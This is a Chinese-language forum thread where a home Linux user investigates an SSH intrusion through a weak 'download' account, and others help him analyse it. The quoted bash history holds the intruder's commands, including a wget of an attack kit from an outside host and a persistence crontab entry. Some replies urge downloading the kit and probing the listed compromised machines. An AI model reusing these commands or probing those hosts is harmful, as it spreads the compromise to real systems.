A*******s 发帖数: 708 | 1 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
bash的history:
uname -a
cat /proc/cpuinfo
ps x
passwd
cd /var/tmp
ls -a
wget freewebtown.com/arapa/as.tgz
tar zxvf as.tgz
rm -rf as.tgz
cd as
rm -rf vuln.txt
touch vuln.txt
chmod +x *
screen
现在的问题是怎么才能看到screen的history,我不知道他在这里做过什么,突然好害
怕…
另外有人知道as这个是干嘛的吗?
$find as
as
as/scan.log
as/nobash.txt
as/a
as/pass.txt
as/sshd
as/start
as/screen
as/pscan2
as/vuln.txt |
l*****g 发帖数: 547 | 2 does your computer directly connected to internet w/o router?
【在 A*******s 的大作中提到】 : 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了 : bash的history: : uname -a : cat /proc/cpuinfo : ps x : passwd : cd /var/tmp : ls -a : wget freewebtown.com/arapa/as.tgz : tar zxvf as.tgz
|
A*******s 发帖数: 708 | 3 22端口开了port forward……
发现it至少从今天早上就进来了
丫的兰州大学
Hostname: 202.201.13.98
ISP: China Education and Research Network
Organization: Lanzhou University
Proxy: None detected
Type: Cable/DSL
【在 l*****g 的大作中提到】 : does your computer directly connected to internet w/o router?
|
wy 发帖数: 14511 | 4 你干了啥对不起党和人民的事?
【在 A*******s 的大作中提到】 : 22端口开了port forward…… : 发现it至少从今天早上就进来了 : 丫的兰州大学 : Hostname: 202.201.13.98 : ISP: China Education and Research Network : Organization: Lanzhou University : Proxy: None detected : Type: Cable/DSL
|
l*****g 发帖数: 547 | 5 It's just try to scan your system for possible break points. :)
maybe more can be found from the screen history.
but your system may be compromised.
【在 A*******s 的大作中提到】 : 22端口开了port forward…… : 发现it至少从今天早上就进来了 : 丫的兰州大学 : Hostname: 202.201.13.98 : ISP: China Education and Research Network : Organization: Lanzhou University : Proxy: None detected : Type: Cable/DSL
|
A*******s 发帖数: 708 | 6 我一个爱国青年能做什么坏事……
【在 wy 的大作中提到】 : 你干了啥对不起党和人民的事?
|
A*******s 发帖数: 708 | 7 我一个爱国青年能做什么坏事……
再请教一下:
/var/auth.log
Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
user download by (uid=0)
Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
user download
CRON这里是什么意思?
【在 wy 的大作中提到】 : 你干了啥对不起党和人民的事?
|
A*******s 发帖数: 708 | 8 怎么看screen history啊?
【在 l*****g 的大作中提到】 : It's just try to scan your system for possible break points. :) : maybe more can be found from the screen history. : but your system may be compromised.
|
z*********n 发帖数: 94654 | 9 你,sudo crontab -l -u download
看看你的download user有啥crontab在run
估计就是那个兰州小孩装了个crontab在运行什么东东
那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
呵呵
如果你的download user没啥权限说不定也没啥大不了的
貌似他想在你的download user地下起一个chroot小系统
看完了把download user删除了吧
userdel -r download
for
for
【在 A*******s 的大作中提到】 : 我一个爱国青年能做什么坏事…… : 再请教一下: : /var/auth.log : Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for : user download by (uid=0) : Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for : user download : CRON这里是什么意思?
|
z*********n 发帖数: 94654 | 10 有点意思
freewebtown.com/arapa/as.tgz
你自己下载下来看看吧,呵呵
【在 z*********n 的大作中提到】 : 你,sudo crontab -l -u download : 看看你的download user有啥crontab在run : 估计就是那个兰州小孩装了个crontab在运行什么东东 : 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了 : 呵呵 : 如果你的download user没啥权限说不定也没啥大不了的 : 貌似他想在你的download user地下起一个chroot小系统 : 看完了把download user删除了吧 : userdel -r download :
|
|
|
z*********n 发帖数: 94654 | 11 好玩,这个人把自己hacked system都列在txt文件里了
还留下bash history给你看,有趣
【在 z*********n 的大作中提到】 : 有点意思 : freewebtown.com/arapa/as.tgz : 你自己下载下来看看吧,呵呵
|
z*********n 发帖数: 94654 | 12 你还可以看看你的系统现在download user正在干啥
ps -u download
看看他究竟在干啥,说不定也就是用你的机器在攻击别人
【在 z*********n 的大作中提到】 : 好玩,这个人把自己hacked system都列在txt文件里了 : 还留下bash history给你看,有趣
|
L***n 发帖数: 6727 | 13 也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来
【在 z*********n 的大作中提到】 : 你还可以看看你的系统现在download user正在干啥 : ps -u download : 看看他究竟在干啥,说不定也就是用你的机器在攻击别人
|
z*********n 发帖数: 94654 | 14 不过你看那个文件
wzd's hacked machine
很像汉语拼音 王志东hack了的机器
【在 L***n 的大作中提到】 : 也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来
|
A*******s 发帖数: 708 | 15 我发现以后第一时间已经kill掉所有download的进程,然后把/etc/passwd里面
downlowd的shell设成false
还有什么地方需要看得吗?我就怕他留了什么后门在我这里,大不了我就重装一下系统
了……因为我看到这里http://ubuntuforums.org/archive/index.php/t-253373.html说
You really should boot of a live CD. You can't analyse your system unless
you know you can trust the binaries you are using. The guest account has
logged in from a couple of addresses today already, you have been cracked
and you can't trust your system anymore. You must boot off of a live cd and
then start inspecting init,
【在 z*********n 的大作中提到】 : 你,sudo crontab -l -u download : 看看你的download user有啥crontab在run : 估计就是那个兰州小孩装了个crontab在运行什么东东 : 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了 : 呵呵 : 如果你的download user没啥权限说不定也没啥大不了的 : 貌似他想在你的download user地下起一个chroot小系统 : 看完了把download user删除了吧 : userdel -r download :
|
wy 发帖数: 14511 | 16 yeah, right
【在 L***n 的大作中提到】 : 也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来
|
A*******s 发帖数: 708 | 17 $ sudo crontab -l -u download
* * * * * /home/download/ /. /.logan/update >/dev/null 2>&1
这个啥意思?
【在 z*********n 的大作中提到】 : 你,sudo crontab -l -u download : 看看你的download user有啥crontab在run : 估计就是那个兰州小孩装了个crontab在运行什么东东 : 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了 : 呵呵 : 如果你的download user没啥权限说不定也没啥大不了的 : 貌似他想在你的download user地下起一个chroot小系统 : 看完了把download user删除了吧 : userdel -r download :
|
z*********n 发帖数: 94654 | 18 永远运行那个.logan/upate程序
你还是把download user彻底删除了吧
你第一时间删除了那些process也没用,crontab还会调用他装的
guest system的命令的
当然最谨慎的做法是重装系统得了
【在 A*******s 的大作中提到】 : $ sudo crontab -l -u download : * * * * * /home/download/ /. /.logan/update >/dev/null 2>&1 : 这个啥意思?
|
A**********e 发帖数: 3102 | 19 其实可以留着玩儿啊。和黑客互斗。每天在版上更新一下,大家给出谋划策。
对了,那个黑客会不会在这里潜水啊?
【在 z*********n 的大作中提到】 : 永远运行那个.logan/upate程序 : 你还是把download user彻底删除了吧 : 你第一时间删除了那些process也没用,crontab还会调用他装的 : guest system的命令的 : 当然最谨慎的做法是重装系统得了
|
z*********n 发帖数: 94654 | 20 他用你的系统scan别人的机器,如果破解了,利用你的机器攻击别人
最后可能你hold responsibility啊,不过,大部分时候估计没这么严重
你自己掂量着玩吧,别用你太多带宽就好,呵呵
你也可以tcpdump一下看看他究竟在干些啥,娱乐娱乐
【在 A**********e 的大作中提到】 : 其实可以留着玩儿啊。和黑客互斗。每天在版上更新一下,大家给出谋划策。 : 对了,那个黑客会不会在这里潜水啊?
|
|
|
z*********n 发帖数: 94654 | 21 哦,对了,你修改你的系统的/etc/passwd可能还是没用
貌似他在download user地下起了一个sub system,他用那个底下的
sshd照样能log到那个guest 系统,呵呵
虽说对你也许破坏不了啥,但也是利用你的资源
你不在乎就好
【在 z*********n 的大作中提到】 : 他用你的系统scan别人的机器,如果破解了,利用你的机器攻击别人 : 最后可能你hold responsibility啊,不过,大部分时候估计没这么严重 : 你自己掂量着玩吧,别用你太多带宽就好,呵呵 : 你也可以tcpdump一下看看他究竟在干些啥,娱乐娱乐
|
A*******s 发帖数: 708 | 22 如果他没获得其他帐号的权限的话,他是怎么实现的呢?/home/download/ 里面没有任
何可疑的文件啊。
【在 z*********n 的大作中提到】 : 哦,对了,你修改你的系统的/etc/passwd可能还是没用 : 貌似他在download user地下起了一个sub system,他用那个底下的 : sshd照样能log到那个guest 系统,呵呵 : 虽说对你也许破坏不了啥,但也是利用你的资源 : 你不在乎就好
|
z*********n 发帖数: 94654 | 23 我估计放在/home/download/.logan底下了
user level guest os不是新鲜事
【在 A*******s 的大作中提到】 : 如果他没获得其他帐号的权限的话,他是怎么实现的呢?/home/download/ 里面没有任 : 何可疑的文件啊。
|
z*********n 发帖数: 94654 | 24 当然也可能/var/tmp 或者/tmp底下
【在 z*********n 的大作中提到】 : 我估计放在/home/download/.logan底下了 : user level guest os不是新鲜事
|
A*******s 发帖数: 708 | 25 没有啦,系统目录里面根本没有logan这个字符串
root@alex:/# find / -name "*logan*"
root@alex:/# find / -user download
/var/run/screen/S-download
/home/download
/home/download/.bash_history
/home/download/.bash_logout
/home/download/.bashrc
/home/download/.profile
/home/download/.ssh
/home/download/.ssh/known_hosts
【在 z*********n 的大作中提到】 : 我估计放在/home/download/.logan底下了 : user level guest os不是新鲜事
|
z*********n 发帖数: 94654 | 26 你有没有进到那个screen session里边看看在运行啥
【在 A*******s 的大作中提到】 : 没有啦,系统目录里面根本没有logan这个字符串 : root@alex:/# find / -name "*logan*" : root@alex:/# find / -user download : /var/run/screen/S-download : /home/download : /home/download/.bash_history : /home/download/.bash_logout : /home/download/.bashrc : /home/download/.profile : /home/download/.ssh
|
A*******s 发帖数: 708 | 27 当时一紧张都kill掉了……貌似现在没法看screen的history了
【在 z*********n 的大作中提到】 : 你有没有进到那个screen session里边看看在运行啥
|
A*******s 发帖数: 708 | 28 我试着(用download帐号)运行it下载那个包里面的screen,提示
./screen: error while loading shared libraries: libutempter.so.0: cannot
open shared object file: No such file or directory
我再用download帐号运行系统的screen,提示
Cannot open your terminal '/dev/pts/1' - please check.
这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
download@alex:/var/tmp/as$ ls -l /dev/pts/
total 0
crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
看bash history,他是想运行系统的screen,那是不是说他也没成功把screen打开呢? |
z*********n 发帖数: 94654 | 29 根据你一楼的帖子,他运行的是系统screen
所以肯定然后在screen里边做了一些事情的
你看那个bash history里,是screen
没有path,调用的一定是系统的screen
你刚才还列出一个/var/run/screen/S-download
这个就是证明screen在download用户下在运行
不知道是还在运行,还是被你kill -9后那个文件没杀掉
你确定现在没有screen process在运行了?
【在 A*******s 的大作中提到】 : 我试着(用download帐号)运行it下载那个包里面的screen,提示 : ./screen: error while loading shared libraries: libutempter.so.0: cannot : open shared object file: No such file or directory : 我再用download帐号运行系统的screen,提示 : Cannot open your terminal '/dev/pts/1' - please check. : 这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。 : download@alex:/var/tmp/as$ ls -l /dev/pts/ : total 0 : crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0 : crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
|
A*******s 发帖数: 708 | 30 root@alex:~# ps aux |grep screen
root 4801 0.0 0.1 3112 724 pts/0 S+ 02:08 0:00 grep screen
现在又可以从download运行系统的screen…真奇怪。
不过我试了一下,/var/run/screen 下面那个文件夹只要运行过一次screen就会一直存
在的,貌似
如果screen被kill了,那么S-download/里面会留下一个socket
如果screen是exit的,那么S-download/就会被清空,包括之前kill留下的socket
【在 z*********n 的大作中提到】 : 根据你一楼的帖子,他运行的是系统screen : 所以肯定然后在screen里边做了一些事情的 : 你看那个bash history里,是screen : 没有path,调用的一定是系统的screen : 你刚才还列出一个/var/run/screen/S-download : 这个就是证明screen在download用户下在运行 : 不知道是还在运行,还是被你kill -9后那个文件没杀掉 : 你确定现在没有screen process在运行了?
|
|
|
E*V 发帖数: 17544 | 31 cron job
for
for
【在 A*******s 的大作中提到】 : 我一个爱国青年能做什么坏事…… : 再请教一下: : /var/auth.log : Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for : user download by (uid=0) : Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for : user download : CRON这里是什么意思?
|
L*****s 发帖数: 24744 | |
Z**0 发帖数: 1119 | 33 大家下载那个文件,打开看看。里边有很多肉机的密码和IP。里边有个这个东西:
WZD's hacked servers。 :)。
这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器,
破解秘密用的。
【在 A*******s 的大作中提到】 : 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了 : bash的history: : uname -a : cat /proc/cpuinfo : ps x : passwd : cd /var/tmp : ls -a : wget freewebtown.com/arapa/as.tgz : tar zxvf as.tgz
|
a*******e 发帖数: 3021 | 34 kao,俺得找找里面有没有俺的服务器
【在 Z**0 的大作中提到】 : 大家下载那个文件,打开看看。里边有很多肉机的密码和IP。里边有个这个东西: : WZD's hacked servers。 :)。 : 这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器, : 破解秘密用的。
|
f*****Q 发帖数: 1912 | 35 没有俺的
【在 a*******e 的大作中提到】 : kao,俺得找找里面有没有俺的服务器
|
z*********n 发帖数: 94654 | 36 从这个例子也看出来,搞个linux的肉鸡多不容易,还得亲自log
in, deploy code
还是windows听话,传播个病毒就搞定了,全自动的
【在 f*****Q 的大作中提到】 : 没有俺的
|
a*******e 发帖数: 3021 | 37 嘿嘿,大虾们,哪个是肉鸡啊?俺看了半天咋都没看出来?
【在 z*********n 的大作中提到】 : 从这个例子也看出来,搞个linux的肉鸡多不容易,还得亲自log : in, deploy code : 还是windows听话,传播个病毒就搞定了,全自动的
|
A*******s 发帖数: 708 | 38 下载那个包里面那些txt就是吧,估计我的也会进入下一个版本了 :-p
【在 a*******e 的大作中提到】 : 嘿嘿,大虾们,哪个是肉鸡啊?俺看了半天咋都没看出来?
|
a*******e 发帖数: 3021 | 39 是有些txt阿,可是看不懂,怎莫看哪个是肉鸡?还是大家都是皇帝的新衣,哈哈哈哈
【在 A*******s 的大作中提到】 : 下载那个包里面那些txt就是吧,估计我的也会进入下一个版本了 :-p
|
z*********n 发帖数: 94654 | 40 所谓肉鸡,就是被compromise了的机器,可以用来攻击别人
所以楼主同学未必本身机器受到了啥伤害,但是沦为肉鸡,别人
能利用他的机器攻击别人了
一般来说用他的机器scan别人继续找别的机器的漏洞而已
【在 a*******e 的大作中提到】 : 是有些txt阿,可是看不懂,怎莫看哪个是肉鸡?还是大家都是皇帝的新衣,哈哈哈哈
|
|
|
a*******e 发帖数: 3021 | 41 俺知道啥是肉鸡。
俺是说,前面有人说那些文件里有好多肉鸡,可是怎么分辨哪个是?还是所有那些ip都
是肉鸡?
没有取得bash或者其他的shell的能算肉鸡吗?
【在 z*********n 的大作中提到】 : 所谓肉鸡,就是被compromise了的机器,可以用来攻击别人 : 所以楼主同学未必本身机器受到了啥伤害,但是沦为肉鸡,别人 : 能利用他的机器攻击别人了 : 一般来说用他的机器scan别人继续找别的机器的漏洞而已
|
z*********n 发帖数: 94654 | 42 你去亲自一个个实验一下吧,呵呵
【在 a*******e 的大作中提到】 : 俺知道啥是肉鸡。 : 俺是说,前面有人说那些文件里有好多肉鸡,可是怎么分辨哪个是?还是所有那些ip都 : 是肉鸡? : 没有取得bash或者其他的shell的能算肉鸡吗?
|
a*******e 发帖数: 3021 | 43 ......俺试过的几个
都ssh不上。。。。。。。
所以才问你们咋知道哪个是肉鸡
【在 z*********n 的大作中提到】 : 你去亲自一个个实验一下吧,呵呵
|
z*********n 发帖数: 94654 | 44 我估计也就是那个wzd曾经猜出密码登录过的机器
大部分人和楼主似的,发现了就关门了,或者是什么dsl机器等等,重启就ip变了之类的
不像个什么牛x黑客
【在 a*******e 的大作中提到】 : ......俺试过的几个 : 都ssh不上。。。。。。。 : 所以才问你们咋知道哪个是肉鸡
|
A*******s 发帖数: 708 | 45 其实我google了以下pscan2,发现别人报告的案例都是查不多的一些文件,譬如有个
pscan2,有个vuln.txt等等
再看a那个script,也就是echo部分和网上的不一样而已,其余都差不多,估计真是个
业余分子,网上搜了下教程就开搞了。
以后不能设弱智密码了,还有就是临时用完的帐号一定要记得disable掉
类的
【在 z*********n 的大作中提到】 : 我估计也就是那个wzd曾经猜出密码登录过的机器 : 大部分人和楼主似的,发现了就关门了,或者是什么dsl机器等等,重启就ip变了之类的 : 不像个什么牛x黑客
|
z*********n 发帖数: 94654 | 46 download / download ?呵呵
【在 A*******s 的大作中提到】 : 其实我google了以下pscan2,发现别人报告的案例都是查不多的一些文件,譬如有个 : pscan2,有个vuln.txt等等 : 再看a那个script,也就是echo部分和网上的不一样而已,其余都差不多,估计真是个 : 业余分子,网上搜了下教程就开搞了。 : 以后不能设弱智密码了,还有就是临时用完的帐号一定要记得disable掉 : : 类的
|
A*******s 发帖数: 708 | 47 you got it...
【在 z*********n 的大作中提到】 : download / download ?呵呵
|
p*****s 发帖数: 344 | 48 仔细看没多少IP
【在 z*********n 的大作中提到】 : 你去亲自一个个实验一下吧,呵呵
|
c********0 发帖数: 262 | 49 呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有
download只有一个字典项,
$ cat pass.txt | grep download
download download
结果lz就中招了。 |
z*********n 发帖数: 94654 | 50 而且那个字典文件好超级小,楼主这招中得太简单了,呵呵
【在 c********0 的大作中提到】 : 呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有 : download只有一个字典项, : $ cat pass.txt | grep download : download download : 结果lz就中招了。
|
|
|
c********0 发帖数: 262 | |
A*******s 发帖数: 708 | 52 是我错了……
【在 c********0 的大作中提到】 : 呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有 : download只有一个字典项, : $ cat pass.txt | grep download : download download : 结果lz就中招了。
|
z*********n 发帖数: 94654 | 53 我以前做过一家公司,那个程序员把密码直接mysql text field存
全部clear text,我没事干select了一下那些密码看,笑死
超级多的简单密码
password1是最多的
还有fuck Password letmein 等等
用这些密码就别怪别人break in了
【在 A*******s 的大作中提到】 : 是我错了……
|